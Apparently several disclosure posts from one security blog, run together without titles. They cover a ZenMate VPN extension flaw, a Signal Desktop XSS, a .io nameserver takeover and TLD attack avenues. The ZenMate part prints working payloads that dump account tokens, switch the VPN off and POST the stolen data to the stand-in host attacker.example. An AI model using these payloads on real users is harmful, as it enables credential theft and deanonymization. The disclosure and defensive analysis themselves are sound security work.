Summary

ZenMate, a VPN provider with over 43 million users, offers several browser extensions for using its VPN. As of the time of this writing the browser extensions have a combined total of ~3.5 million users. The ZenMate VPN clients for both Chrome and Firefox trust the (previously expired) domain name zenmate.li, which can make privileged API calls to the browser extension via message passing. I saw that this domain name was unregistered and bought it both to prove the issue and to mitigate the vulnerability (since nobody else can buy it now that I own it). By hosting scripts on this domain it is possible to make use of the privileged APIs exposed via the page_api.js Content Script. After I reached out to the vendor they pushed out a fix very quickly, and it is available in the latest version of the extension.

Impact

This exploit has the following impact, all of which can be achieved without any user interaction (other than the victim visiting a webpage):

  • Dump all of the victim’s account information. Some of the more interesting bits include:
      • The authentication UUID and secret token, which can be used to log in to the victim’s account.
      • Account ID
      • Email address
      • Email confirmation status
      • A list of all past email addresses used with the service, as well as when each change occurred.
      • Account type and subscription information
      • The victim’s country
      • Device information along with detailed platform information, last sign-in time, usage stats such as ads/malware blocked, the device token, and more.
      • Whether or not the victim is connected to the VPN service.

  • Toggle off their VPN connection, allowing the attacker to reveal the victim’s true IP address and deanonymize them.
  • Update the credentials which the extension is using (e.g. log the victim’s extension into another account).
  • Inject rules into the extension which will force the extension not to proxy when visiting specifically declared sites. This allows an attacker to inject rules for domains they own in order to persist the deanonymization.

Vulnerability Details

The following is an excerpt from the Chrome extension’s manifest.json:

...trimmed for brevity...
{
  "js": [
    "scripts/page_api.js"
  ],
  "matches": [
    "*://*.zenmate.com/*",
    "*://*.zenmate.ae/*",
    "*://*.zenmate.ma/*",
    "*://*.zenmate.dk/*",
    "*://*.zenmate.at/*",
    "*://*.zenmate.ch/*",
    "*://*.zenmate.de/*",
    "*://*.zenmate.li/*",
    "*://*.zenmate.ca/*",
    "*://*.zenmate.co.uk/*",
    "*://*.zenmate.ie/*",
    "*://*.zenmate.co.nz/*",
    "*://*.zenmate.com.ar/*",
    "*://*.zenmate.cl/*",
    "*://*.zenmate.co/*",
    "*://*.zenmate.es/*",
    "*://*.zenmate.mx/*",
    "*://*.zenmate.com.pa/*",
    "*://*.zenmate.com.pe/*",
    "*://*.zenmate.com.ve/*",
    "*://*.zenmate.fi/*",
    "*://*.zenmate.fr/*",
    "*://*.zenmate.co.il/*",
    "*://*.zenmate.in/*",
    "*://*.zenmate.hu/*",
    "*://*.zenmate.co.id/*",
    "*://*.zenmate.is/*",
    "*://*.zenmate.it/*",
    "*://*.zenmate.jp/*",
    "*://*.zenmate.kr/*",
    "*://*.zenmate.lu/*",
    "*://*.zenmate.lt/*",
    "*://*.zenmate.lv/*",
    "*://*.zenmate.my/*",
    "*://*.zenmate.be/*",
    "*://*.zenmate.nl/*",
    "*://*.zenmate.pl/*",
    "*://*.zenmate.com.br/*",
    "*://*.zenmate.pt/*",
    "*://*.zenmate.ro/*",
    "*://*.zenmate.com.ru/*",
    "*://*.zenmate.se/*",
    "*://*.zenmate.sg/*",
    "*://*.zenmate.com.ph/*",
    "*://*.zenmate.com.tr/*",
    "*://*.zenmate.pk/*",
    "*://*.zenmate.vn/*",
    "*://*.zenmate.hk/*"
  ],
  "run_at": "document_start"
}
...trimmed for brevity...

The above shows that the Content Script scripts/page_api.js is run on all pages matching the patterns listed above. One of these is the *://*.zenmate.li/* pattern, which matches the expired domain name that I bought.

The page_api.js Content Script does two things:

Injects a script into the page which exposes a JavaScript API (the __zm object used in the payloads below).

Sets up listeners for the following custom events (a rough sketch of how a page drives these listeners follows the list):

  • toggle
  • setPageExcludes
  • updateZM
  • removeCredentials
  • updateWithCredentials
  • request:getData
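
For context, here is a minimal sketch of how the injected page-side API presumably bridges to these listeners. The reply event name and payload shapes below are assumptions for illustration, not taken from the extension’s source: the point is that privileged calls boil down to CustomEvents dispatched on the page, which page_api.js relays to the extension.

// Sketch of the page <-> content script bridge (assumed event/payload shapes).
function zmToggle(enabled: boolean): void {
  // "toggle" is one of the custom events the content script listens for
  document.dispatchEvent(new CustomEvent("toggle", { detail: enabled }));
}

function zmGetData(callback: (results: unknown) => void): void {
  document.addEventListener(
    "response:getData", // assumed reply event name
    evt => callback((evt as CustomEvent).detail),
    { once: true }
  );
  document.dispatchEvent(new CustomEvent("request:getData"));
}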

Due to the extension’s trust of the zenmate.li domain (and any of its subdomains), we can use these privileged calls for nefarious purposes. For example, we can pull all of the victim’s account information by making the request:getData call. The following is an example payload which does this:

// Make call to Content Script to get all user data
__zm.getData(function(results) {
    console.log(
        results
    );
});

When a user with the ZenMate VPN extension installed visits a zenmate.li page hosting this payload, we can extract all of the victim’s sensitive account information. The following is an example of the data you can steal (I used a temporary account I created for this demo):

{
  "user": {
    "id": 43643953,
    "email": "[email protected]",
    "unconfirmed_email": null,
    "flags": {},
    "premium_expires_at": "2018-06-04 01:33:22 UTC",
    "partner_id": null,
    "idhash": "c86d4aac37946935a5e13c543326e5477fe9b43a0a2b2307db5977797d48d5c1",
    "marketable": true,
    "mkt_opt_in": "out",
    "opt": "out",
    "banned": false,
    "discount_code": "7JGA-QLKU-J930-EVAH",
    "confirmation_sent_at": "2018-05-28 05:57:04 UTC",
    "has_recurring_subscription": false,
    "is_intermediate_premium": true,
    "paid_premium_expires_at": null,
    "created_at": "2018-05-28 00:48:25 UTC",
    "account_type": "PREMIUM",
    "server_time": "2018-05-28 05:58:16 UTC",
    "actual_country": "US",
    "subscription_country": "US",
    "country_code": "US",
    "locale": "US",
    "connected_country": "",
    "connected": false,
    "current_ip": "172.68.140.235",
    "anon": false,
    "is_premium": true,
    "is_verified": true,
    "is_b2b": false,
    "is_btr": true,
    "active_product": "premium",
    "service_status": "trial",
    "is_tenant": false,
    "is_anonymous": false,
    "bus_id": null,
    "has_opted_in": false,
    "reminder_emails": true,
    "active_order_id": 9532193,
    "recurrence_count": 0,
    "affiliate_id": null,
    "subscription": {
      "purchased_at": "2018-05-28 01:33:22 UTC",
      "expires_at": "2018-06-04 01:33:22 UTC",
      "sku": "7_day",
      "title": "Premium trial",
      "description": "7 days free Premium"
    },
    "email_history": [
      {
        "changed_from": "[email protected]",
        "changed_to": "[email protected]",
        "created_at": "2018-05-28T07:57:14.657+02:00"
      }
    ]
  },
  "device": {
    "created_at": "2018-05-28 04:11:41 UTC",
    "current_sign_in_at": "2018-05-28 05:58:16 UTC",
    "features": [
      {
        "id": "ADBLOCK",
        "enabled": true,
        "available": true,
        "description": "Enable ad blocking"
      },
      {
        "id": "MALWAREBLOCK",
        "enabled": true,
        "available": true,
        "description": "Enable blocking of harmful sites"
      }
    ],
    "id": 59551317,
    "install_id": "ee983860-753a-14f6-31c0-208bff9e9bf5",
    "last_sign_in_at": "2018-05-28 04:11:45 UTC",
    "platform": {
      "id": "72338bed-f4ec-483c-b6f6-2771c38e92a9",
      "platform_name": "Chrome",
      "platform_vendor": "Google",
      "icon": "chrome",
      "environment": "browser_extension"
    },
    "platform_version": [],
    "registered_for_push_notifications": false,
    "stats": {
      "ads_blocked": 0,
      "bad_sites_blocked": 0,
      "gzip_compression_ration": 0,
      "webp_compression_ratio": 0,
      "compresssion_ratio": 0
    },
    "token": "e09a9bdbcf8c6fda2c11c60eb761a943d4ab448c3dbf0579938780f18ce35f16",
    "updated_at": "2018-05-28 05:58:16 UTC",
    "uuid": "d8fa9eed-47c8-4566-9e57-a812495d3b4c"
  },
  "version": "6.2.3"
}
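
In a real attack the payload would presumably not just log this dump but exfiltrate it to a server the attacker controls. A minimal sketch (the collection URL is purely hypothetical):

// Hypothetical exfiltration payload hosted on zenmate.li.
declare const __zm: any; // page API injected by the extension's page_api.js

__zm.getData(function (results: unknown) {
  // Ship the stolen account/device dump to an attacker-controlled endpoint
  fetch("https://attacker.example/collect", {
    method: "POST",
    body: JSON.stringify(results),
  });
});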

Deanonymizing a user is similar and can be done with a payload like the following:

// Turn off VPN
__zm.toggle(false);

The following is a proof-of-concept page demonstrating this issue. Upon visiting it with the (previously vulnerable) ZenMate VPN extension installed, your VPN will be toggled off, your account information will be dumped, and your real IP will be revealed:

https://zenmate.li/poc.html

Thoughts on Root Cause & Remediation

This vulnerability exhibits a fairly common coding pattern in Chrome extensions: privileged API calls are declared inside the extension and then delegated, via Content Scripts, to regular web domains owned by the author. This pattern is generally problematic because Chrome extensions enforce things like minimum Content Security Policies (CSP) and have external navigation and embedding blocking enabled by default. When you build a bridge out of the secured Chrome extension environment and then greatly increase the attack surface via over-scoping, you’re setting yourself up for failure. With the Content Script policy previously in place, all that an attacker needed to make privileged extension API calls was an XSS (or domain/sub-domain takeover) in any sub-domain of any of the dozens of domains listed. The patch applied by the vendor for both the Chrome and Firefox extensions was to remove all domains except for *://*.zenmate.com/*. While this is still a fairly wide scope, it is at least preferable to the original policy. However, all it would take to exploit this vulnerability again is an XSS in any sub-domain of zenmate.com (or the base domain itself).
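
As a defense-in-depth sketch (this is not ZenMate’s actual code, and the trusted origin below is just an example), the background script can also re-validate the sender of every relayed message before honoring privileged requests, so a single over-broad match pattern is not the only line of defense:

// Sketch: validate the sender before servicing privileged requests.
declare const chrome: any; // provided by the browser in an extension context

const TRUSTED_ORIGINS = new Set(["https://account.zenmate.com"]); // example origin, assumed

chrome.runtime.onMessage.addListener((message: any, sender: any) => {
  const origin = sender.url ? new URL(sender.url).origin : "";
  if (!TRUSTED_ORIGINS.has(origin)) {
    return; // drop anything not coming from the explicit allowlist
  }
  // ...handle getData / toggle / etc. here...
});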

Exploit Video

Disclosure Timeline

  • May 28, 2:15am – Disclosed issue via security contact email address.
  • May 28, 2:38am – Confirmed by vendor.
  • May 28, 9:00pm – Patch issued for Chrome and Firefox extensions.

Remediation TL;DR

If you’re a concerned Signal user please update to the latest version of Signal Desktop (fixed in v1.11.0), which addresses all of these issues. Note that the mobile apps for Signal were not affected by this issue.

Background Information

If you’re an avid follower of all that is security-Twitter, then you’ve probably heard about the impressive finding of Remote Code Execution (RCE) via HTML markup injection in Signal Desktop by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor):

Shortly after seeing this Tweet I wanted to validate whether this finding was indeed real, so I played around with my own copy of Signal Desktop to see if I could reproduce the results. I previously worked with @LittleJoeTables and @infosec_au on research investigating exploitation of web-on-desktop type apps, so I was fairly certain I knew what I was looking at. I began playing around with the Signal Desktop app trying to get arbitrary HTML markup to be evaluated, but it didn’t appear to be straightforward. After trying a few different fields (name, plain message, etc.) I eventually found that if you created a message with HTML markup (say, <h1>Test</h1>) and then sent a Quoted Reply to that message, the original markup would be evaluated as HTML! I then posted on Twitter that I was able to reproduce the problem:

“Wait a Minute…”

However, something was not quite right. I later applied the Signal update and yet I was still able to exploit my issue, so I thought there was something wrong with my install. I uninstalled Signal Desktop and didn’t think much of it until I later read the writeup done by the security researchers. Upon reading the writeup I realized the researchers were just sending vanilla Signal messages which were being interpreted as HTML, not the Quoted Replies that I had been using. I messaged @HacKanCuBa on Twitter to discuss this oddity, and he tried my method on his copy of Signal Desktop to find…the exploit still worked! As it turns out, these were two separate but very similar vulnerabilities resulting in the same impact. Who could have guessed that?

After this realization we quickly notified Signal of the issue. They had a patch out in hours which was very impressive and they even added in some extra mitigations to prevent the problem from occurring again.

Vulnerability Root Cause

For the full writeup on the original vulnerability, see this article. Here we’ll dive into the root cause of my particular variant (CVE-2018-11101) and show how Signal fixed it.

The core of the vulnerability was in the use of React’s dangerouslySetInnerHTML in order to render the contents of a Quoted Reply message. The relevant code can be found in Quote.tsx and is the following:

  public renderText() {
    const { i18n, text, attachments } = this.props;

    if (text) {
      return (
        <div className="text" dangerouslySetInnerHTML={{ __html: text }} />
      );
    }
...trimmed for brevity...

To quote the React documentation itself:

dangerouslySetInnerHTML is React’s replacement for using innerHTML in the browser DOM. In general, setting HTML from code is risky because it’s easy to inadvertently expose your users to a cross-site scripting (XSS) attack. So, you can set HTML directly from React, but you have to type out dangerouslySetInnerHTML and pass an object with a __html key, to remind yourself that it’s dangerous.

Much like innerHTML, use of dangerouslySetInnerHTML is, well, dangerous and can lead to XSS like what occurred in the Signal Desktop app. This allowed the quoted-reply text to be evaluated as HTML and served as the basis of this exploit.

Signal fixed this by removing the usage of dangerouslySetInnerHTML, along with further tightening the app’s CSP.
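
For illustration, here is a minimal sketch of the safer pattern (not Signal’s actual patch): pass the quoted text as a React child so that React escapes it, rather than injecting it via dangerouslySetInnerHTML.

import * as React from "react";

// Sketch only: React escapes children by default, so the quoted text is
// rendered as text instead of being parsed as HTML.
export function QuoteText(props: { text?: string }) {
  if (!props.text) {
    return null;
  }
  return <div className="text">{props.text}</div>;
}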

All said and done this vulnerability was present in the Signal Desktop app for about three weeks total before being patched (starting in 1.8.0).

Going Forward

Thanks to some help from my friends @aegarbutt and @LittleJoeTables we were able to compile a list of strategic defense-in-depth recommendations for Signal Desktop which we’ve sent to the Signal security team per their request. At the end of the day there will always be new “hot” vulnerabilities, but the “vendor” response is generally what separates the wheat from the chaff. The Signal team’s quick patch time along with a strong interest in mitigating vulnerabilities of this type in the future was encouraging to see. I’ll remain a Signal user for the foreseeable future :)

Exploit Video

Timeline

  • 4:31 PM – May 11, 2018 PST – Discovery of exploit, although originally mistaken by me for a duplicate.
  • ~3:30 PM – May 14, 2018 PST – Revelation that exploit works against latest version of Signal
  • 3:57 PM – May 14, 2018 PST – Vulnerability disclosed to Signal Security
  • 4:21 PM – May 14 2018 PST – Signal requests 24 hours before disclosure to ensure users patch. States a patch will be out in 2-3 hours.
  • ~5:47 PM – May 14 2018 PST – Patch pushed to all Signal Desktop users

Credits

Special thanks to the following folks:


In a previous post we talked about taking over the .na, .co.ao, and .it.ao domain extensions with varying levels of DNS trickery. In that writeup we examined the threat model of compromising a top level domain (TLD) and what some avenues would look like for an attacker to accomplish this goal. One of the fairly simple methods brought up was to register the domain name of one of the TLD’s authoritative nameservers. Since a TLD can have authoritative nameservers at arbitrary domain names, it’s possible that, through a misconfiguration, expiration, or some other issue, someone would be able to register a nameserver domain name and use it to serve new DNS records for the entire TLD zone. The relevant quote from the previous post I’ll include here:

This avenue was something I was fairly sure was going to be the route to victory, so I spent quite a lot of time building out tooling to check for vulnerabilities of this type. The process is essentially to enumerate all nameserver hostnames for a given extension and then check to see if any of the base domains are expired and available for registration. The main issue I ran into is that many registries will tell you that a domain is totally available until you actually attempt to purchase it. Additionally, there were a few instances where a nameserver domain was expired but for some reason still unavailable for registration despite not being marked as reserved. This scanning led to the enumeration of many domain takeovers under restricted TLD/domain extension space (.gov, .edu, .int, etc.) but none in the actual TLD/domain extensions themselves.

As it turns out, this method was not only a plausible way to attack a TLD, it actually led to the compromise of the biggest TLD yet.

The .io Anomaly

While graphing out the DNS delegation paths of various TLDs late on a Friday night I noticed a script I had written was giving me some unexpected results for the .io TLD:

io._trust_tree_graph

One of the features of this script (called TrustTrees) is that you can pass it a Gandi API key and it will check to see if any of the nameservers in the delegation chain have a domain name that’s available for registration. It appeared that Gandi’s API was returning that multiple .io nameserver domains were available for purchase! This does not necessarily mean you can actually register these domain names however, since in the past I had seen multiple incidents where registries would state a domain name was available but wouldn’t allow the actual registration to go through due to the domain name being “reserved”. I decided to go straight to the source and check the registry’s website at NIC.IO to see if this was true. After a quick search for the nameserver domain of ns-a1.io I was surprised to find that the registry’s website confirmed that this domain was available for the registration price of 90.00 USD. Given that this was around midnight I decided to go ahead and attempt to purchase the domain to see if it would actually go through. Shortly afterwards I received an email confirming that my domain name registration was “being processed”:

ns-a1.io_domain_purchase_confirmation_receipt

It’s not clear why I received a confirmation from 101Domain, but apparently .io’s registrations (and possibly their entire registry?) are managed via this company. Since it was well past midnight at this point I shrugged it off and eventually forgot about the registration until the following Wednesday morning, when I got the following notification as I was walking out the door to go to work:

ns-a1.io_domain_activated_email

At this point I was instantly reminded of the details of that registration and I turned around to check if I had actually just gained control over one of .io’s nameservers. I ran a quick dig command for the domain and sure enough my test DNS nameservers (ns1/ns2.networkobservatory.com) were listed for ns-a1.io:

bash-3.2$ dig NS ns-a1.io

; <<>> DiG 9.8.3-P1 <<>> NS ns-a1.io
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8052
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;ns-a1.io.          IN  NS

;; ANSWER SECTION:
ns-a1.io.       86399   IN  NS  ns2.networkobservatory.com.
ns-a1.io.       86399   IN  NS  ns1.networkobservatory.com.

;; Query time: 4 msec
;; SERVER: 2604:5500:16:32f9:6238:e0ff:feb2:e7f8#53(2604:5500:16:32f9:6238:e0ff:feb2:e7f8)
;; WHEN: Wed Jul  5 08:46:44 2017
;; MSG SIZE  rcvd: 84

bash-3.2$

I queried one of the root DNS servers to again confirm that this domain was listed as one of the authoritative nameservers for the .io TLD and sure enough, it definitely was:

bash-3.2$ dig NS io. @k.root-servers.net.

; <<>> DiG 9.8.3-P1 <<>> NS io. @k.root-servers.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19611
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 7, ADDITIONAL: 12
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;io.                IN  NS

;; AUTHORITY SECTION:
io.         172800  IN  NS  ns-a1.io.
io.         172800  IN  NS  ns-a2.io.
io.         172800  IN  NS  ns-a3.io.
io.         172800  IN  NS  ns-a4.io.
io.         172800  IN  NS  a0.nic.io.
io.         172800  IN  NS  b0.nic.io.
io.         172800  IN  NS  c0.nic.io.

;; ADDITIONAL SECTION:
ns-a1.io.       172800  IN  AAAA    2001:678:4::1
ns-a2.io.       172800  IN  AAAA    2001:678:5::1
a0.nic.io.      172800  IN  AAAA    2a01:8840:9e::17
b0.nic.io.      172800  IN  AAAA    2a01:8840:9f::17
c0.nic.io.      172800  IN  AAAA    2a01:8840:a0::17
ns-a1.io.       172800  IN  A   194.0.1.1
ns-a2.io.       172800  IN  A   194.0.2.1
ns-a3.io.       172800  IN  A   74.116.178.1
ns-a4.io.       172800  IN  A   74.116.179.1
a0.nic.io.      172800  IN  A   65.22.160.17
b0.nic.io.      172800  IN  A   65.22.161.17
c0.nic.io.      172800  IN  A   65.22.162.17

;; Query time: 70 msec
;; SERVER: 2001:7fd::1#53(2001:7fd::1)
;; WHEN: Wed Jul  5 08:46:14 2017
;; MSG SIZE  rcvd: 407

Yikes! I quickly SSHed into my DNS testing server that was now hosting this domain and killed the BIND server that was running. If I was starting to receive DNS traffic I certainly didn’t want to serve up bad responses for people trying to legitimately access their .io domain names. With the BIND server no longer responding to queries on port 53, all DNS queries would automatically fail over to the other nameservers for the TLD and traffic wouldn’t be greatly affected (other than a slight delay in resolution time while DNS clients failed over to working nameservers). In order to see if I was actually receiving traffic I did a quick tcpdump of all DNS traffic to a file to see just how many queries I was currently getting. I immediately saw hundreds of queries verbosely being printed to my terminal from random IP addresses across the Internet. It looked like I was definitely serving up traffic for the entire .io TLD, and worse yet this was likely only the beginning, since many DNS clients were still operating on cached DNS records which would clear shortly.

Reporting a Security Issue in a TLD

With my server no longer responding to any DNS queries my mind was then set on getting this fixed as quickly as possible. My main concern was that there were multiple other nameserver domains which could still be registered by anyone with the money and the knowledge to do so. I looked up the contacts for the .io TLD in IANA’s root database:

io_contact_info

I then wrote up a summary of the issue, emailed both contacts about the problem, and conveyed the urgency of the fix. I stated my concern with the other TLD nameserver domains being available for registration and said that if I didn’t receive a response within a few hours I would go ahead and register those as well to protect the TLD. After sending the email I immediately received a bounce message indicating that the [email protected] address did not exist at all:

email_bounce

This was not a strong vote of confidence that someone was going to see this notice. I decided to take action and just spend the money to buy the other nameserver domains to prevent anyone else from hijacking the TLD. Just like with the first domain I explicitly set my DNS server to not respond to inbound queries so that it wouldn’t interfere with regular .io traffic. Those domain orders were actually filled quite quickly:

securing_other_nameservers

Phew. At the very least this could no longer be exploited by any random attacker and I was able to head to work with much less worry.

Later that day I called NIC.IO’s support phone number and requested the appropriate email address for any security personnel/team that they had for the TLD. The agent assured me that [email protected] was the appropriate contact for this issue (which I double verified just to be sure). While it seemed unlikely to be the correct contact, I forwarded the report to that email address as well, hoping that at the very least it would be forwarded by the abuse department to the appropriate place. With few other leads on reaching an appropriate security contact I waited for a response.

“Oops” – Remediation via Revoked Domains

Around noon the following day I received a blast of notifications from 101Domain stating that my domain privacy was deactivated, my “support ticket” was answered, and all of my domains had been revoked by the registry:

101domain_email_blast

Looks like, shockingly enough, the abuse@ alias was the correct email address for the issue. After logging into my 101Domain account I found the following message from the 101Domain legal department:

101domain_oops_deleted_io_ns

All said and done this was actually an excellent response time (though usually I just get a “fixed it” response via email instead of a Legal Department notice). After verifying that I was not able to re-register these domains, it appeared that the issue had been completely remediated.

Impact

Given the fact that we were able to take over four of the seven authoritative nameservers for the .io TLD, we would be able to poison/redirect the DNS for all registered .io domain names. Not only that, but since we control a majority of the nameservers (four of seven, or roughly 57% of queries) it’s actually more likely that clients will randomly select our hijacked nameservers over any of the legitimate nameservers, even before employing tricks like long TTL responses to further tilt the odds in our favor. Even assuming an immediate response to a large scale redirection of all .io domain names, it would be some time before the cached records fell out of the world’s DNS resolvers.

One mitigating factor that should be mentioned is that the .io TLD has DNSSEC enabled. This means that if your resolver supports it you should be defended from an attacker sending bad/forged DNS data in the way mentioned above. That being said, as mentioned in a previous post DNSSEC support is pretty abysmal and I rarely encounter any support for it unless I specifically set a resolver up that supports it myself.
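
If you’re curious whether the resolver you’re using actually validates DNSSEC, a quick sanity check (sketched below with Node’s dns module) is to query a deliberately mis-signed test zone such as dnssec-failed.org; a validating resolver should refuse to resolve it.

import { promises as dns } from "node:dns";

// dnssec-failed.org is intentionally broken; a validating resolver returns
// SERVFAIL for it, while a non-validating resolver happily hands back addresses.
dns.resolve4("dnssec-failed.org")
  .then(addrs => console.log("Resolved", addrs, "-- this resolver is NOT validating DNSSEC"))
  .catch(err => console.log(`Lookup failed (${err.code}) -- this resolver appears to validate DNSSEC`));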

*As an unrelated aside, it’s important to remember to kill tcpdump after you’ve started it. Not doing that is a great way to obliterate your VPS disk space with DNS data, which was an unexpected additional impact of this :). Please note that any DNS data recorded for debugging purposes has now been purged for the privacy of the users of the .io TLD/its domains.

Mitigations and TLD Security

I’ve already written at some length about how some of these issues could be mitigated from a TLD perspective (see Conclusions & Final Thoughts of the post The Journey to Hijacking a Country’s TLD – The Hidden Risks of Domain Extensions for more info on this). In the future I hope to publish a more extensive guide on how TLDs and domain extension operators can better monitor and prevent issues like this from occurring.

Greetz

I promised a friend of mine that I would do a silly old-school hacker shout-out in my next blog post, so I’m fulfilling this obligation here :). Special thanks to the following folks for both moral and “immoral” support (as phrased by the one and only HackerBadger).

Greetz to [HackerBadger](https://twitter.com/aegarbutt), EngSec (y’all know who you are), and the creator of the marquee tag. [Hack the planet](https://www.youtube.com/watch?v=u3CKgkyc7Qo), [the gibson](https://www.youtube.com/watch?v=Bmz67ErIRa4), etc.

I will liken him to a wise man, who built his house on a rock. The rain came down, the floods came, and the winds blew, and beat on that house; and it didn’t fall, for it was founded on the rock. Everyone who hears these words of mine, and doesn’t do them will be like a foolish man, who built his house on the sand. The rain came down, the floods came, and the winds blew, and beat on that house; and it fell—and great was its fall.

The Parable of the Wise and Foolish Builders

Domain names are the foundation of the Internet that we all enjoy. However, despite the number of people who use them, very few understand how they work behind the scenes. Due to many layers of abstraction and various web services, many people are able to own a domain and set up an entire website without knowing anything about DNS, registrars, or even WHOIS. While this abstraction has a lot of very positive benefits, it also masks a lot of important information from the end customer. For example, many registrars are more than happy to advertise a .io domain name to you, but how many .io owners actually know who owns and regulates .io domains? I don’t think it’s a large stretch to say that most domain owners know little to nothing about the entities behind their domain name. The question that is asked even less is “What is this domain extension’s track record for security?”.

A Quick Introduction to the DNS Structure

Feel free to skip this section if you already know how DNS works and is delegated.

So what are you buying when you purchase a domain name? At its core, you’re simply buying a few NS (nameserver) records which will be hosted on the extension’s nameservers (this of course excludes secondary services such as WHOIS, registry/registrar operational costs, and other fees which go to ICANN). To better understand an extension’s place in the DNS chain we’ll take a look at a graph of example.com’s delegation chain. I’ve personally found that visualization is very beneficial when it comes to understanding how DNS operates, so I’ve written a tool called TrustTrees which builds a graph of the delegation paths for a domain name:

example.com_trust_tree_graph

The above graph shows the delegation chain starting at the root level DNS server. For those unfamiliar with the DNS delegation process, it works via a continual chain of referrals until the target nameserver has been found. A client looking for the answer to a DNS query will start at the root level, querying one of the root nameservers for the answer to a given DNS query. The roots of course likely don’t know the answer and will delegate the query to a TLD, which will in turn delegate it to the appropriate nameservers and so on until an authoritative answer has been received confirming that the nameserver’s response is from the right place. The above graph shows all of the possible delegation paths which could take place (blue indicates an authoritative answer). There are many paths because DNS responses contain lists of answers in an intentionally random order (a technique known as Round Robin DNS) in order to provide load balancing for queries. Depending on the order of the results returned different nameservers may be queried for an answer and thus they may provide different results altogether. The graph shows all these permutations and shows the relationships between all of these nameservers.
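
As a rough illustration of these delegation levels (a sketch using Node’s dns module and your normal recursive resolver, rather than walking referrals by hand the way TrustTrees does), you can ask for the NS records at each label boundary of a name:

import { promises as dns } from "node:dns";

// Print who is authoritative at each level of the name, e.g.
// "com" -> the gTLD servers, "example.com" -> the domain's own nameservers.
async function delegationLevels(domain: string): Promise<void> {
  const labels = domain.replace(/\.$/, "").split(".");
  for (let i = labels.length - 1; i >= 0; i--) {
    const zone = labels.slice(i).join(".");
    const ns = await dns.resolveNs(zone).catch(() => [] as string[]);
    console.log(`${zone.padEnd(15)} -> ${ns.join(", ") || "(no NS records returned)"}`);
  }
}

delegationLevels("example.com");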

So, as discussed above, if you bought example.com the .com registry would add a few NS records to its DNS zones which would delegate any DNS queries for example.com to the nameservers you provided. This delegation to your nameservers is what really gives you control over the domain name and the ability to make arbitrary sub-domains and DNS records for example.com. If the .com owning organization decided to remove the nameserver (NS) records delegating to your nameservers then nobody would ever reach your nameservers and thus example.com would cease to work at all.

Taking this up a step in the chain you can think of TLDs and domain extensions in much the same way as any other domain name. TLDs only exist and can operate because the root nameservers delegate queries for them to the TLD’s nameservers. If the root nameservers suddenly decided to remove the .com NS records from its zone database then all .com domain names would be in a world of trouble and would essentially cease to exist.

Just Like Domain Names, Domain Name Extensions Can Suffer From Nameserver Vulnerabilities

Now that we understand that TLDs and domain extensions have nameservers just like regular domain names, one question that comes up is “Does that mean that TLDs and domain extensions can suffer from DNS security issues like domain names do?”. The answer, of course, is yes. If you’ve read some of the past posts on this blog, you know that nameservers can be hijacked in a variety of ways. We’ve shown how an expired or typo-ed nameserver domain name can lead to hijacking, and we’ve also seen how many hosted DNS providers allow for gaining control over a domain’s zone without any verification of ownership. Taking the lessons we’ve learned from these explorations, we can apply the same knowledge to attempt a much more grandiose feat: taking over an entire domain extension.

The Mission to Take Over a Domain Extension – The Plan of Attack

Unlike a malicious actor, I’m unwilling to take many of the actions which would likely allow you to quickly achieve the goal of hijacking a domain extension. Over the course of researching methods for attacking domain extensions I found that many extension/TLD nameservers and registries are in an abysmal state to begin with, so exploiting and gaining control over one is actually much easier than many would think. Although I consider tactics like obtaining remote code execution on a registry/nameserver to be out of scope, I will still mention them as a viable route to success, since real world actors will likely have little regard for ethics.

Generally speaking, the following are some ways that I came up with for compromising a TLD/domain extension:

  • Exploiting a vulnerability in the DNS server which hosts a given domain extension, or exploiting any other services hosted on an extension’s nameservers. Attacking registries also falls into this same category, as they have the ability to update these zones as part of normal operation.
  • Finding and registering an expired or typo-ed nameserver domain which is authoritative for a domain extension/TLD.
  • Hijacking the domain extension by recreating a DNS zone in a hosted provider which no longer has the zone for the extension hosted there.
  • Hijacking the email addresses associated with a TLD’s WHOIS contact information (as listed in the IANA root zone database).

We’ll go over each of these and talk about some of the results found while investigating these avenues as possible routes to our goal.

Vulnerable TLD & Domain Extension Nameservers Are Actually Quite Common

To begin researching the first method of attack, I decided to do a simple port scan of all of the TLD nameservers. In a perfect world what you would like to see is a list of servers listening on UDP/TCP port 53 with all other ports closed. Given the powerful position of these nameservers it is important to have as little surface area as possible. Any additional services exposed such as HTTP, SSH, or SMTP are all additional pathways for an attacker to exploit in order to compromise the given TLD/domain extension.
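
A quick-and-dirty way to check this yourself is sketched below: probe a handful of common TCP ports on a nameserver and flag anything listening besides DNS. (The hostname is just an example; UDP port 53 and a proper scanner like nmap are left out for brevity.)

import { Socket } from "node:net";

// Returns true if a TCP connection to host:port succeeds within the timeout.
function probe(host: string, port: number, timeoutMs = 3000): Promise<boolean> {
  return new Promise(resolve => {
    const sock = new Socket();
    const done = (open: boolean) => { sock.destroy(); resolve(open); };
    sock.setTimeout(timeoutMs, () => done(false));
    sock.once("connect", () => done(true));
    sock.once("error", () => done(false));
    sock.connect(port, host);
  });
}

async function main(): Promise<void> {
  const host = "ns-a1.io"; // example nameserver hostname
  const ports = [22, 25, 53, 80, 443, 3306]; // SSH, SMTP, DNS, HTTP(S), MySQL
  for (const port of ports) {
    console.log(`${host}:${port}`, (await probe(host, port)) ? "open" : "closed/filtered");
  }
}

main();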

This section is a bit awkward because I want to outline how dire the situation is without encouraging any malicious activity. During the course of this investigation there were a few situations where simply browsing things like websites hosted on the TLD nameservers led to strong indicators of both exploitability and in some cases even previous compromise. I will be omitting these and focusing only on some key examples to demonstrate the point.

Finger

The finger protocol was written in 1971 by Les Earnest to allow users to check the status of a user on a remote computer. This is an incredibly old protocol which is no longer used on any modern systems. The idea of the protocol is essentially to answer the question of “Hey, is Dave at his machine right now? Is he busy?”. With finger you can check the remote user’s login name, real name, terminal name, idle time, login time, office location and office phone number. As an example, we’ll finger one of the authoritative nameservers for the country of Bhutan and see what the root user is up to:

bash-3.2$ finger -l [email protected]
[202.29.151.3]
Login: root                       Name: Charlie Root
Directory: /root                        Shell: /bin/sh
Last login Sat Dec 14 16:41 2013 (ICT) on console
No Mail.
No Plan.

